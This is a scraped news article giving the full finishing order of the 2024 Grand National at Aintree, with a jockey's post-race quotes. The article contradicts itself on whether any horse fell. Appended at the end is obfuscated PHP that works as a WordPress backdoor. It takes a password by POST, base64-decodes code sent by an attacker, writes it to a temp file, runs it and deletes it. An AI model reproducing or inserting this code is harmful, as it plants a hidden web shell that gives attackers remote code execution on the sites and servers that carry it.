Published On: Sat, Apr 13th, 2024

Grand National results in full: Where every horse placed at Grand National 2024 | Racing | Sport

I Am Maximus soared on the final straight to record a famous win for Willie Mullins, Paul Townend and JP McManus in the Grand National after last year’s winner, Corach Rambler, fell at the first hurdle. The race favourite was barely mentioned until the final few fences after a disappointing start, but Townend rode strongly and comfortably sealed victory in Liverpool.

Townend produced a huge whoop of joy before speaking to ITV Racing moments after his career-defining victory.

He said: “What an unbelievable race and an unbelievable horse. It is a bit surreal, to be honest. I ended up being first to the first and got to the Melling Road, and he backed back.

“He got careful on the second circuit, but I was trying to conserve energy. I didn’t get the clearest run between the second-last and last. I had the ones in front of me in my sights, and he responded like I thought he would.

“Gold Cups and Grade Ones are special but Grand Nationals are different. You need so much luck. I am a lucky boy.”

The Jockey Club has confirmed that of the 32 starters in the Grand National, there were no fallers, and 21 horses finished the race.

Express Sport provides the Grand National results in full following another memorable steeplechase at Aintree.

Place your bets on the 2024 Grand National with bet365

1st – I Am Maximus (Paul Townend) 7/1

2nd – Delta Work (J W Kennedy) 28-1

3rd – Minella Indo (Rachael Blackmore) 28-1

4th – Galvin (Sam Ewing) 40-1

5th – Kitty’s Light (Jack Tudor) 16/1

6th – Ain’t That A Shame (David Maxwell) 40/1

7th – Meetingofthewaters (Danny Mullins) 14/1

8th – Galia Des Liteaux (Harry Skelton) 28/1

9th – Roi Mage (James Reveley) 66/1

10th – Limerick Lace (Mark Walsh) 9/1

11th – Coko Beach (Jordan Gainford) 22/1

12th – Latenightpass (Gina Andrews) 40/1

13th – The Goffer (Sean Bowen) 66/1

14th – Vanillier (Sean Flanagan) 14/1

15th – Eklat De Rire (Darragh O’Keeffe) 125/1

16th – Panda Boy (JJ Slevin) 12/1

17th – Capodanno (Keith Donoghue) 25/1

18th – Nassalam (Caoilin Quinn) 66/1

19th – Noble Yeats (Harry Cobden) 25/1

20th – Eldorado Allen (Brendan Powell) 100/1

21st – Adamantly Chosen (Sean O’Keeffe) 50/1

Source link

Verified by MonsterInsights
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}